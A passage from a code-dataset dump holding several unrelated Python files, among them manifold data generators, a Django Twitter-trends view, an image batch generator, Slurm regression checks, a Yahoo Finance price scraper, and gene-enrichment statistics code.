np.sin(p), 0.5 * p, np.zeros((dim - 3, n))]).T\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_helicoid_data(n, dim, d, sampler):\n assert d <= dim\n assert d == 2\n assert dim >= 3\n u = 2 * np.pi / n + sampler(n) * 2 * np.pi\n v = 5 * np.pi * sampler(n)\n data = np.vstack([np.cos(v), np.sin(v) * np.cos(v), u, np.zeros((dim - 3, n))]).T\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_roll_data(n, dim, d, sampler):\n assert d < dim\n assert dim >= 3\n assert d == 2\n t = 1.5 * np.pi * (1 + 2 * sampler(n))\n p = 21 * sampler(n)\n\n data = np.vstack([t * np.cos(t), p, t * np.sin(t), np.zeros((dim - d - 1, n))]).T\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_scurve_data(n, dim, d, sampler):\n assert d < dim\n assert dim >= 3\n assert d == 2\n t = 3 * np.pi * (sampler(n) - 0.5)\n p = 2.0 * sampler(n)\n\n data = np.vstack(\n [np.sin(t), p, np.sign(t) * (np.cos(t) - 1), np.zeros((dim - d - 1, n))]\n ).T\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_sphere_data(n, dim, d, sampler):\n assert d < dim\n # V = np.random.randn(n, d + 1)\n V = sampler(n, d + 1)\n data = np.hstack(\n [V / np.sqrt((V ** 2).sum(axis=1))[:, None], np.zeros((n, dim - d - 1))]\n )\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_norm_data(n, dim, d, sampler):\n assert d <= dim\n norm_xyz = np.random.multivariate_normal(np.zeros(d), np.identity(d), n)\n data = np.hstack([norm_xyz, np.zeros((n, dim - d))])\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_uniform_data(n, dim, d, sampler):\n assert d <= dim\n uniform_xyz = np.random.uniform(size=(n, d))\n data = np.hstack([uniform_xyz, np.zeros((n, dim - d))])\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_cubic_data(n, dim, d, sampler):\n assert d < dim\n cubic_data = np.array([[]] * (d + 1))\n for i in range(d + 1):\n n_once = int(n / (2 * (d + 1)) + 1)\n # 1st side\n data_once = sampler(d + 1, n_once)\n data_once[i] = 0\n cubic_data = np.hstack([cubic_data, data_once])\n # 2nd side\n data_once = sampler(d + 1, n_once)\n data_once[i] = 1\n cubic_data = np.hstack([cubic_data, data_once])\n cubic_data = cubic_data.T[:n]\n data = np.hstack([cubic_data, np.zeros((n, dim - d - 1))])\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_moebius_data(n, dim, d, sampler):\n assert dim == 3\n assert d == 2\n\n phi = sampler(n) * 2 * np.pi\n rad = sampler(n) * 2 - 1\n data = np.vstack(\n [\n (1 + 0.5 * rad * np.cos(5.0 * phi)) * np.cos(phi),\n (1 + 0.5 * rad * np.cos(5.0 * phi)) * np.sin(phi),\n 0.5 * rad * np.sin(5.0 * phi),\n ]\n ).T\n\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_affine_data(n, dim, d, sampler):\n assert dim >= d\n\n p = sampler(d, n) * 5 - 2.5\n v = np.eye(dim, d)\n # v = np.random.randint(0, 10, (dim, d))\n data = v.dot(p).T\n\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_affine3_5_data(n, dim, d, sampler):\n assert dim == 5\n assert d == 3\n\n p = 4 * sampler(d, n)\n A = np.array(\n [\n [1.2, -0.5, 0],\n [0.5, 0.9, 0],\n [-0.5, -0.2, 1],\n [0.4, -0.9, -0.1],\n [1.1, -0.3, 0],\n ]\n )\n b = np.array([[3, -1, 0, 0, 8]]).T\n data = A.dot(p) + b\n data = data.T\n\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_nonlinear4_6_data(n, dim, d, sampler):\n assert dim == 6\n assert d == 4\n\n p0, p1, p2, p3 = sampler(d, n)\n data = np.vstack(\n [\n p1 ** 2 * np.cos(2 * np.pi * p0),\n p2 ** 2 * np.sin(2 * np.pi * p0),\n p1 + p2 + (p1 - p3) ** 2,\n p1 - 2 * p2 + (p0 - p3) ** 2,\n -p1 - 2 * p2 + (p2 - p3) ** 2,\n p0 ** 2 - p1 ** 2 + p2 ** 2 - p3 ** 2,\n ]\n 
).T\n\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_nonlinear_data(n, dim, d, sampler):\n assert dim >= d\n m = int(dim / (2 * d))\n assert dim == 2 * m * d\n\n p = sampler(d, n)\n F = np.zeros((2 * d, n))\n F[0::2, :] = np.cos(2 * np.pi * p)\n F[1::2, :] = np.sin(2 * np.pi * p)\n R = np.zeros((2 * d, n))\n R[0::2, :] = np.vstack([p[1:], p[0]])\n R[1::2, :] = np.vstack([p[1:], p[0]])\n D = (R * F).T\n data = np.hstack([D] * m)\n\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_paraboloid_data(n, dim, d, sampler):\n assert dim == 3 * (d + 1)\n\n E = np.random.exponential(1, (d + 1, n))\n X = ((1 + E[1:] / E[0]) ** -1).T\n X = np.hstack([X, (X ** 2).sum(axis=1)[:, np.newaxis]])\n data = np.hstack([X, np.sin(X), X ** 2])\n\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_star_data(n, dim, d, sampler):\n assert dim >= d\n assert d == 1\n assert dim >= 2\n\n t = np.pi - sampler(n) * 2 * np.pi\n omega = 5\n data = np.concatenate(\n (\n ((1 + 0.3 * np.cos(omega * t)) * np.cos(t)).reshape(-1, 1),\n ((1 + 0.3 * np.cos(omega * t)) * np.sin(t)).reshape(-1, 1),\n np.zeros((n, dim - 2)),\n ),\n axis=1,\n )\n\n assert data.shape == (n, dim)\n return data\n\n","sub_path":"skdim/gendata.py","file_name":"gendata.py","file_ext":"py","file_size_in_byte":16404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"391873138","text":"from django.shortcuts import render\nfrom .forms import *\nfrom .twitter_credentials import *\nimport tweepy\nfrom geopy import Nominatim\n\n\"\"\"\nThis app is used for authentication and filtering Tweets based on the user-input on the home-page. \nAnd searching for Trends based on User-Input in Location Form. \n\"\"\"\n\n\nclass TwitterAuthenticator:\n \"\"\"\n Class to authenticate based on entries in twitter_credentials.\n \"\"\"\n def authenticate_twitter_app(self):\n auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n return auth\n\n\nclass TwitterClient:\n \"\"\"\n Uses Authenticator Class to pull tweets based on user input.\n \"\"\"\n def __init__(self):\n self.auth = TwitterAuthenticator().authenticate_twitter_app()\n self.twitter_client = tweepy.API(self.auth)\n\n def get_twitter_client_api(self):\n return self.twitter_client\n\n def get_tweets(self, request):\n input_hashtag = request.POST['input_hashtag']\n input_num = int(request.POST['input_num'])\n twitter_client = TwitterClient()\n api = twitter_client.get_twitter_client_api()\n tweets = [status for status in tweepy.Cursor(api.search, q=input_hashtag).items(input_num)]\n return tweets\n\n\n\"\"\"\nDisplays the home.html and forms where the user can input their hashtag, number of Tweets and location.\n\"\"\"\n\n\ndef home(request):\n hashtag_form = HashtagForm()\n num_form = NumForm()\n location = LocationForm()\n\n # Checks whether location was submitted and renders the result, otherwise just displays standard home.html\n if request.POST.get(\"input_location\") != None:\n input_location = request.POST.get(\"input_location\")\n geolocator = Nominatim(user_agent=\"TweetAnalyser\")\n # Looks for location based on input\n loc = geolocator.geocode(input_location)\n twitter_client = TwitterClient()\n api = twitter_client.get_twitter_client_api()\n location_data = api.trends_closest(loc.latitude, loc.longitude)\n # Where on earth ID based on Tweets\n woeid = location_data[0][\"woeid\"]\n # List of top 10\n top10_trends = []\n try:\n trends_results = api.trends_place(woeid)\n 
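# note: trends_place returns a one-element list; element['trends'] holds trend dicts whose 'name' values are collected below\n 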
for trend in trends_results[0][\"trends\"][:10]:\n top10_trends.append(trend[\"name\"])\n except tweepy.error.TweepError:\n return render(request, 'home.html', {'hashtag_form': hashtag_form, \"num_form\": num_form, 'location': location})\n return render(request, 'home.html', {'hashtag_form': hashtag_form, \"num_form\": num_form, 'location': location,\n 'input_location': input_location, 'top10_trends': top10_trends})\n else:\n return render(request, 'home.html', {'hashtag_form': hashtag_form, \"num_form\": num_form, 'location': location})\n","sub_path":"TSentimentAnalyser/App_TwitterDataCollector/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"385867934","text":"import os, sys\nsys.path.append('../')\nimport cv2\nimport numpy as np\nimport pandas as pd\nfrom base_info import *\n\n\nclass BatchGenerator:\n\tdef __init__(self):\n\t\tself.read_CSVs()\n\t\tself.shuffle_CSVs()\n\n\n\tdef read_CSVs(self):\n\t\tself.CSV_TRAIN = pd.read_csv(PATH_CSV_TRAIN)\n\t\tself.CSV_TEST = pd.read_csv(PATH_CSV_TEST)\n\t\n\n\tdef shuffle_CSVs(self):\n\t\t''' Shuffle the CSV using the random_seed '''\n\t\trandom_seed = np.random.randint(0, 10000)\n\t\tnp.random.seed(seed=random_seed)\n\t\tself.CSV_TRAIN = self.CSV_TRAIN.reindex(np.random.permutation(self.CSV_TRAIN.index))\n\t\tself.CSV_TRAIN = self.CSV_TRAIN.reset_index()\n\t\tself.CSV_TEST = self.CSV_TEST.reindex(np.random.permutation(self.CSV_TEST.index))\n\t\tself.CSV_TEST = self.CSV_TEST.reset_index()\n\n\tdef store_data_by_score(self):\n\t\tscore_1 = self.CSV_TRAIN[self.CSV_TRAIN['score_l'] == 1]\n\t\tdel score_1['index']\n\t\tdel score_1['Unnamed: 0']\t\n\t\t\n\t\tscore_2 = self.CSV_TRAIN[self.CSV_TRAIN['score_l'] == 2]\n\t\tdel score_2['index']\n\t\tdel score_2['Unnamed: 0']\t\n\t\t\n\t\tscore_3 = self.CSV_TRAIN[self.CSV_TRAIN['score_l'] == 3]\n\t\tdel score_3['index']\n\t\tdel score_3['Unnamed: 0']\t\n\t\t\n\t\tscore_4 = self.CSV_TRAIN[self.CSV_TRAIN['score_l'] == 4]\n\t\tdel score_4['index']\n\t\tdel score_4['Unnamed: 0']\t\n\t\t\n\t\tscore_1_data = []\n\t\tscore_1_masks = []\n\t\tfor item in score_1['patient_frame']:\n\t\t\tim = self.get_inp_image(str(item))\n\t\t\tmask = self.get_ground_truth_image(str(item))\n\t\t\tscore_1_data.append(im)\n\t\t\tscore_1_masks.append(mask)\n\t\t\n\t\tscore_2_data = []\n\t\tscore_2_masks = []\n\t\tfor item in score_2['patient_frame']:\n\t\t\tim = self.get_inp_image(str(item))\n\t\t\tmask = self.get_ground_truth_image(str(item))\n\t\t\tscore_2_data.append(im)\n\t\t\tscore_2_masks.append(mask)\n\t\t\n\t\tscore_3_data = []\n\t\tscore_3_masks = []\n\t\tfor item in score_3['patient_frame']:\n\t\t\tim = self.get_inp_image(str(item))\n\t\t\tmask = self.get_ground_truth_image(str(item))\n\t\t\tscore_3_data.append(im)\n\t\t\tscore_3_masks.append(mask)\n\t\t\n\t\tscore_4_data = []\n\t\tscore_4_masks = []\n\t\tfor item in score_4['patient_frame']:\n\t\t\tim = self.get_inp_image(str(item))\n\t\t\tmask = self.get_ground_truth_image(str(item))\n\t\t\tscore_4_data.append(im)\n\t\t\tscore_4_masks.append(mask)\n\t\t\n\t\t# creating numpy array for all\n\t\tscore_1_data = np.array(score_1_data)\n\t\tscore_1_masks = np.array(score_1_masks)\n\t\tscore_2_data = np.array(score_2_data)\n\t\tscore_2_masks = np.array(score_2_masks)\n\t\tscore_3_data = np.array(score_3_data)\n\t\tscore_3_masks = np.array(score_3_masks)\n\t\tscore_4_data = np.array(score_4_data)\n\t\tscore_4_masks = 
np.array(score_4_masks)\n\t\t\n\t\t# Storing the numpy arrays to disk for faster retrieval afterwards instead of image by image\t\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_1, 'im.npy'), score_1_data)\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_2, 'im.npy'), score_2_data)\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_3, 'im.npy'), score_3_data)\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_4, 'im.npy'), score_4_data)\n\t\t\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_1, 'labels.npy'), score_1_masks)\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_2, 'labels.npy'), score_2_masks)\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_3, 'labels.npy'), score_3_masks)\n\t\tnp.save(os.path.join(PATH_DATA_SCORE_4, 'labels.npy'), score_4_masks)\n\n\t\n\tdef convert_img_to_one_hot_encoded(self, im):\n\t\th, w = im.shape\n\t\tone_hot = np.zeros([h, w, 2])\n\t\tone_hot_p = np.zeros([h, w])\n\t\tone_hot_n = np.zeros([h, w])\n\t\tone_hot_p[im == 255] = 1\t# positive channel: pixels inside the mask\n\t\tone_hot_n[im != 255] = 1\t# negative channel: the complement of the mask\n\t\tone_hot[:, :, 0] = one_hot_p\n\t\tone_hot[:, :, 1] = one_hot_n\n\t\treturn np.array(one_hot).astype(np.float32)\t\t\n\n\n\tdef get_inp_image(self, data, channel=-1):\n\t\tpath = os.path.join(PATH_ROOT, '{}/Perio_Frame/{}.png'.format(data.split('_')[0], data.split('_')[-1]))\n\t\tim = np.array(cv2.imread(path))\n\t\tim = cv2.GaussianBlur(im, (7, 7), 1.0)\n\t\tif channel == -1: # 3 channel\n\t\t\treturn im\n\t\telse:\n\t\t\treturn im[:, :, channel]\n\t\n\t\n\tdef get_ground_truth_image(self, data):\n\t\tpath = os.path.join(PATH_ROOT, '{}/masks2/{}.png'.format(data.split('_')[0], data.split('_')[-1]))\n\t\treturn np.array(cv2.imread(path, 0))\n\t\n\n\tdef batch_generator(self):\n\t\tfor i in range(0, len(self.CSV_TRAIN), TRAIN_BATCH_SIZE):\n\t\t\tbatch_csv = self.CSV_TRAIN[i: i+TRAIN_BATCH_SIZE]\n\t\t\tbatch_csv = batch_csv.reset_index()\t# reset the slice's own index so XY[j]/S[j] below start at 0\n\n\t\t\tXY = batch_csv['patient_frame']\n\t\t\tS = batch_csv['score_l']\n\n\t\t\tbatch_X = []\n\t\t\tbatch_Y = []\n\t\t\tbatch_S = []\n\t\t\t\n\t\t\ttry:\n\t\t\t\tfor j in range(TRAIN_BATCH_SIZE):\n\t\t\t\t\t_channel = -1 if N_CHANNELS_IN == 3 else 0\n\t\t\t\t\tx = self.get_inp_image(XY[j], channel=_channel) # blue channel == 0\n\t\t\t\t\ty = self.get_ground_truth_image(XY[j])\n\t\t\t\t\ts = int(S[j])\n\n\t\t\t\t\tbatch_X.append(x)\n\t\t\t\t\tbatch_Y.append(y)\n\t\t\t\t\tbatch_S.append(s)\n\n\t\t\t\tif N_CHANNELS_IN == 3:\n\t\t\t\t\tbatch_X = np.array(batch_X).astype(np.float32)\n\t\t\t\telse:\n\t\t\t\t\tbatch_X = np.expand_dims(np.array(batch_X).astype(np.float32), -1)\n\t\t\t\tbatch_Y = np.expand_dims(np.array(batch_Y).astype(np.float32), -1)\n\t\t\t\tbatch_S = np.array(batch_S).astype(np.int32)\n\t\t\t\t# print('{}\\t{}\\t{}'.format(batch_X.shape, batch_Y.shape, batch_S.shape))\n\t\t\t\t\n\t\t\t\tyield batch_X, batch_Y, batch_S\n\n\t\t\texcept:\n\t\t\t\tprint('Error while generating batch !! Check')\n\t\t\t\treturn\n\n\n\tdef get_test_dataset(self):\n\t\tX = []\n\t\tY = []\n\t\tS = []\n\t\t\n\t\tfor i in range(len(self.CSV_TEST)):\n\t\t\tXY = self.CSV_TEST['patient_frame'][i]\n\t\t\t_S = self.CSV_TEST['score_l'][i]\n\t\t\t\t\t\t\n\t\t\ttry:\n\t\t\t\t_channel = -1 if N_CHANNELS_IN == 3 else 0\n\t\t\t\tx = self.get_inp_image(XY, channel=_channel)\n\t\t\t\ty = self.get_ground_truth_image(XY)\n\t\t\t\ts = int(_S)\n\t\t\t\t\n\t\t\t\tX.append(x)\n\t\t\t\tY.append(y)\n\t\t\t\tS.append(s)\n\t\n\t\t\texcept:\n\t\t\t\tprint('Error!! 
Check')\n\t\t\t\treturn\n\t\t\t\t\n\t\tif N_CHANNELS_IN == 3:\n\t\t\tX = np.array(X).astype(np.float32)\n\t\telse:\n\t\t\tX = np.expand_dims(np.array(X).astype(np.float32), -1)\n\t\tY = np.expand_dims(np.array(Y).astype(np.float32), -1)\n\t\tS = np.array(S).astype(np.int32)\n\t\t\n\t\treturn X, Y, S\n\t\t\t\t\n\n\nif __name__ == '__main__':\n\tgen = BatchGenerator()\n\tgen.store_data_by_score()\n\t'''\n\tprint('-'*100)\n\ta, b, c = gen.next()\n\tprint(a.max())\n\tprint(b.max())\n\tprint(c.max())\n\t\n\ta = np.load(os.path.join(PATH_DATA_SCORE_1, '1.npy'))\n\tprint(a.shape)\n\tb = np.load(os.path.join(PATH_DATA_SCORE_2, '2.npy'))\n\tprint(b.shape)\n\tc = np.load(os.path.join(PATH_DATA_SCORE_3, '3.npy'))\n\tprint(c.shape)\n\td = np.load(os.path.join(PATH_DATA_SCORE_4, '4.npy'))\n\tprint(d.shape)\n\t'''\n","sub_path":"Controller/create_and_store_bins.py","file_name":"create_and_store_bins.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"624962724","text":"import os\nimport reframe.utility.sanity as sn\n\nfrom reframe.core.pipeline import RunOnlyRegressionTest\n\n\nclass SbucheckCommandCheck(RunOnlyRegressionTest):\n def __init__(self, **kwargs):\n super().__init__('slurm_cscs_usertools_sbucheck',\n os.path.dirname(__file__), **kwargs)\n self.valid_systems = ['daint:login', 'dom:login']\n self.descr = 'Slurm CSCS usertools sbucheck'\n self.executable = 'sbucheck'\n self.valid_prog_environs = ['PrgEnv-cray']\n self.num_tasks = 1\n self.num_tasks_per_node = 1\n self.tags = {'cscs_usertools', 'production',\n 'maintenance', 'single-node', 'ops'}\n self.sanity_patterns = sn.assert_found(\n r'Per-project usage at CSCS since', self.stdout)\n self.maintainers = ['VK']\n\n\nclass MonthlyUsageCheck(RunOnlyRegressionTest):\n def __init__(self, **kwargs):\n super().__init__('slurm_cscs_usertools_monthly_usage',\n os.path.dirname(__file__), **kwargs)\n self.valid_systems = ['daint:login', 'dom:login']\n self.descr = 'Slurm CSCS usertools monthly_usage'\n self.executable = 'monthly_usage'\n self.valid_prog_environs = ['PrgEnv-cray']\n self.num_tasks = 1\n self.num_tasks_per_node = 1\n self.tags = {'cscs_usertools', 'production',\n 'maintenance', 'single-node', 'ops'}\n self.sanity_patterns = sn.assert_found(\n r'Usage in Node hours for the Crays', self.stdout)\n self.maintainers = ['VK']\n\n\ndef _get_checks(**kwargs):\n return [SbucheckCommandCheck(**kwargs), MonthlyUsageCheck(**kwargs)]\n","sub_path":"cscs-checks/system/slurm/cscs_usertools.py","file_name":"cscs_usertools.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"636688396","text":"from Variables import * \nimport xlrd\nimport xlwt\nimport csv\nfrom urllib import request\nfrom bs4 import BeautifulSoup\n\n\n\"\"\"-----------------------------------------------------------------------------------\n\nCreates historical data array with entry for split only adjusted price. \n\n-----------------------------------------------------------------------------------\"\"\"\ndef addHistoricalSplit(data):\n tempData = data\n data = []\n \n for i in tempData:\n data.append(i[0:7])\n \n \"\"\"data is in format: \n 0-date, 1-open, 2-high, 3-low, 4-close, 5-adj-close, 6-volume. 
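\n\n    Illustrative example (hypothetical numbers): walking backwards in time, if the\n    raw close jumps from 50 to 100 while the adjusted close barely moves, pctClose\n    and pctAdj differ by far more than the 2.5% tolerance, so the day is treated as\n    a 2-for-1 split and the running divisor is doubled.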
\n    \"\"\"\n    data[0].append(data[0][4])\n    divisor = 1\n    for i in range(1, len(data)):\n        currentDayClose = float(data[i-1][4])\n        previousDayClose = float(data[i][4])\n        pctClose = (currentDayClose-previousDayClose)/currentDayClose\n        tolerance = 0.025\n        \n        currentDayAdj = float(data[i-1][5])\n        previousDayAdj = float(data[i][5])\n        pctAdj = (currentDayAdj - previousDayAdj)/currentDayAdj\n        \n        \"\"\"If there is a difference between pctClose and pctAdj, it usually means\n        a dividend or a split occurred. A dividend is not as big as a split so if\n        the difference is within 2.5%, the difference is classified as a dividend. \n        Anything larger is classified as a split. \"\"\"\n        if((pctClose - tolerance) <= pctAdj and pctAdj <= (pctClose + tolerance)):\n            pass\n        else:\n            withoutSplit = currentDayClose * (1 - pctAdj)\n            split = previousDayClose / withoutSplit\n            divisor *= split\n        \n        if(divisor != 1): \n            data[i].append(float(data[i][4])/divisor)\n        else:\n            data[i].append(float(data[i][4]))\n    \n#    for i in data:\n#        print(i)\n    return data\n\n\"\"\"-----------------------------------------------------------------------------------\n\nReturns historical stock data in array with [date, closing price] \n\n-----------------------------------------------------------------------------------\"\"\"\ndef getHistoricalPrices(tickerName):\n    fileVariables = Variables()\n    directory = fileVariables.directory\n    fileEnding = fileVariables.returnFileEnding(tickerName)\n\n    try:\n        csv_file = open(directory + tickerName+'-Y.csv', \"r\")\n        reader = csv.reader(csv_file, delimiter = ' ')\n        yahoo_data_array = []\n    except:\n        try:\n            csv_file = open(directory + tickerName+'.csv', \"r\")\n            reader = csv.reader(csv_file, delimiter = ' ')\n            yahoo_data_array = []\n        except:\n            print('Error : File Not Opening')\n\n    switched = False\n    for lines in reader:\n        if('Date' in lines or 'Date' in lines[0].split(',')):\n            split = lines[0].split(',')\n            if(split[5] == 'Volume'):\n                switched = True\n            pass\n        else:\n            yahoo_data_array.insert(0,lines[0].split(','))\n#    print(switched)\n    \n    \"\"\"If volume and adj close are switched, swap them around [5] and [6]\"\"\" \n    if(switched == True):\n        index = 0 \n        for i in yahoo_data_array:\n            temp = []\n            if(i[5] == 'null'):\n                del yahoo_data_array[index]\n                continue\n            for j in range(0,5):\n                temp.append(i[j])\n            temp.append(i[6])\n            temp.append(i[5])\n            del yahoo_data_array[index]\n            yahoo_data_array.insert(index, temp)\n            index += 1\n    \n    \n    for i in yahoo_data_array:\n        dates = i[0].split('-')\n        i[0] = dates[0] + '/' + dates[1] + '/' + dates[2]\n\n    firstDate = float(yahoo_data_array[0][0].split('/')[0])\n    if(firstDate < 2016):\n        yahoo_data_array.reverse()\n    \n    i = 0\n    while(i < len(yahoo_data_array)):\n        if('null' in yahoo_data_array[i]):\n            del yahoo_data_array[i]\n            i -= 1\n        i += 1\n    \n    yahoo_data_array = addHistoricalSplit(yahoo_data_array)\n    \n    return yahoo_data_array\n\n\n\n\"\"\"-----------------------------------------------------------------------------------\n\nAs of 18 May 2017 getting historical stock prices off of Yahoo Finance does not work. \nWhat I need to do is make my own database by first downloading excel data from Yahoo \nFinance by hand. This historical closing stock data is then updated by scraping either\nthe Yahoo Finance website or Google Finance. \n\nThe first method is to take historical data downloaded by hand and put it\nin stock.db\n\nThis method is for scraping and then updating data for stock. 
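\n\nSketch of intended use (the ticker symbol is illustrative only):\n\n    sqlData = getHistoricalPrices('AAPL')\n    sqlData = updateHistoricalPrice('AAPL', sqlData)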
\n\n-----------------------------------------------------------------------------------\"\"\"\ndef updateHistoricalPrice(tickerName, sqlData): \n yahooFinance = \"https://finance.yahoo.com/quote/\" + tickerName + \"/history?p=\" + tickerName\n \n tempWebFile = request.urlopen(yahooFinance).read()\n tempData = BeautifulSoup(tempWebFile, \"lxml\")\n \n lines = tempData.find_all('div')\n priceInfo = ''\n \n for i in lines:\n if str(i).find('data-test=\"historical-prices\"') > 0:\n priceInfo = str(i)\n \n# print(priceInfo)\n\n month1 = [[\"Jan\", 1], [\"Feb\", 2], [\"Mar\", 3], [\"Apr\", 4], [\"May\", 5], [\"Jun\", 6], [\"Jul\", 7],\n [\"Aug\", 8], [\"Sep\", 9], [\"Oct\", 10], [\"Nov\", 11], [\"Dec\", 12]]\n\n index = priceInfo.find('>')\n priceHistory = []\n priceDay = []\n foundMonth = False\n added = 0\n while(index > 0):\n# print(priceInfo)\n temp = ''\n while(index < len(priceInfo) and priceInfo[index] != '<'):\n temp += priceInfo[index]\n index += 1\n \n temp = temp[1:]\n\n \"\"\"If temp includes a month, add next 7 \"\"\"\n if(foundMonth == False):\n for i in month1:\n if (temp.find(i[0]) >= 0):\n month = str(i[1])\n if(float(month) < 10):\n month = '0' + month\n day = ''\n \n commaFind = 4\n while(temp[commaFind] != ','):\n day += temp[commaFind]\n commaFind += 1\n day = day.strip()\n \n year = temp.split(',')[1].strip()\n date = year + '/' + month + '/' + day \n priceDay.append(date)\n\n priceInfo = priceInfo[index:]\n added = 0 \n foundMonth = True \n break\n \n elif(foundMonth == True and added < 6):\n if(len(temp) > 0):\n keyword = temp.replace(',','')\n \"\"\"Skip if the row has \"Dividend\" in it \"\"\"\n if(keyword == 'Dividend'):\n foundMonth = False\n added = 0\n priceDay = []\n else:\n priceDay.append(keyword)\n added += 1\n \n if(foundMonth == True and added >= 6):\n added = 0\n foundMonth = False\n priceHistory.append(priceDay)\n priceDay = []\n \n priceInfo = priceInfo[index:]\n index = priceInfo.find('>')\n \n latestSQLDate = sqlData[0][0]\n\n \n index = 0\n for i in priceHistory:\n# print(i)\n if(latestSQLDate == i[0]):\n break\n index += 1\n \n# print(index)\n \n for i in range(0,index):\n sqlData.insert(i,priceHistory[i])\n \n for i in sqlData:\n if(len(i) < 8):\n i.append(i[4])\n \n \"\"\"If the price history has \"Stock Split\" in it, remove from array. 
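Rows whose open or high field is '-' are dropped here as well.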
\"\"\"\n for i in sqlData:\n if('Stock Split' in i):\n sqlData.remove(i)\n if(i[1] == '-' or i[2] == '-'):\n sqlData.remove(i)\n \n sqlData = addHistoricalSplit(sqlData) \n \n return sqlData\n \n","sub_path":"HistoricalPricesData/Download.py","file_name":"Download.py","file_ext":"py","file_size_in_byte":7882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"266249651","text":"import komand\nimport time\nfrom .schema import GetAlertForActorInput, GetAlertForActorOutput\n# Custom imports below\n\n\nclass GetAlertForActor(komand.Trigger):\n\n def __init__(self):\n super(self.__class__, self).__init__(\n name='get_alert_for_actor',\n description='Get alerts by an actor',\n input=GetAlertForActorInput(),\n output=GetAlertForActorOutput())\n self.ACTOR = \"Actor\"\n\n def run(self, params={}):\n \"\"\"Run the trigger\"\"\"\n while True:\n actor = params['actor']\n\n matching_alerts = self.connection.get_alerts_by_key_value(self.ACTOR, actor)\n if(len(matching_alerts) > 0):\n self.send({\"results\": matching_alerts})\n\n time.sleep(params.get(\"interval\", 5))\n\n def test(self):\n # This will raise an exception for failure cases\n self.connection.test()\n\n # No exception raised, pass back json\n return {\"results\": self.connection.fake_alert()}\n","sub_path":"microsoft_atp/komand_microsoft_atp/triggers/get_alert_for_actor/trigger.py","file_name":"trigger.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"5063760","text":"from scipy.stats import hypergeom, rankdata, chisqprob, fisher_exact\nimport logging\n\nfrom joblib import Memory\n\nMEMORY = Memory(cachedir=\"./\")\n\n\n@MEMORY.cache(verbose=0)\ndef compute_statistics(df, gene_vectors):\n\n \"\"\"Compute statistics for the gene lists overlap counts.\"\"\"\n\n logging.info(\"Performing hypergeometric tests.\")\n df = compute_go_overrepresentation_analysis(df)\n df = compute_odds_ratio(df)\n\n stat_method = find_appropriate_statistical_test(gene_vectors)\n\n if stat_method == \"LAP\":\n\n logging.info(\"Computing the Leisering, Alonzo and Pepe test.\")\n df = lap_ppv(df)\n fdr_cols = [\"a_hpgm_go\", \"b_hpgm_go\", \"chi_sq\"]\n\n elif stat_method == \"FE\":\n\n logging.info(\"Computing the Fisher Exact test.\")\n df = fishers_exact(df)\n fdr_cols = [\"a_hpgm_go\", \"b_hpgm_go\", \"fisher\"]\n\n\n elif stat_method == \"FE_SUB\":\n logging.info(\"Computing the Fisher Exact for subsets.\")\n df = fishers_exact_sub(df)\n fdr_cols = [\"a_hpgm_go\", \"b_hpgm_go\", \"fisher\"]\n\n elif stat_method == \"NA\":\n\n fdr_cols = [\"a_hpgm_go\"]\n\n logging.info(\"Computing FDR.\")\n df = compute_fdr(df, fdr_cols)\n\n return df\n\n\ndef compute_odds_ratio(df):\n\n df[\"a_odds\"] = (df[\"a_I_go\"] / df[\"a\"]) / \\\n ((df[\"U\"] - (df[\"a\"] + df[\"go_subtree\"] - df[\"a_I_go\"])) / (df[\"U\"] - df[\"a\"]))\n\n\n if \"b\" in df:\n df[\"b_odds\"] = (df[\"b_I_go\"] / df[\"b\"]) / \\\n ((df[\"U\"] - (df[\"b\"] + df[\"go_subtree\"] - df[\"b_I_go\"])) / (df[\"U\"] - df[\"b\"]))\n return df\n\n\ndef fishers_exact(df):\n\n \"\"\"Compute Fisher Exact for diff in a and b go overlap.\"\"\"\n\n df[\"fisher\"] = df.apply(lambda row:\n fisher_exact([\n [row[\"a_I_go\"], row[\"a\"] - row[\"a_I_go\"]],\n [row[\"b_I_go\"], row[\"b\"] - row[\"b_I_go\"]]\n ], alternative=\"two-sided\")[1],\n axis=1)\n\n return df\n\n\ndef fishers_exact_sub(df):\n\n \"\"\"Fisher Exact for diff in a and b go overlap when b subset of a.\n\n 
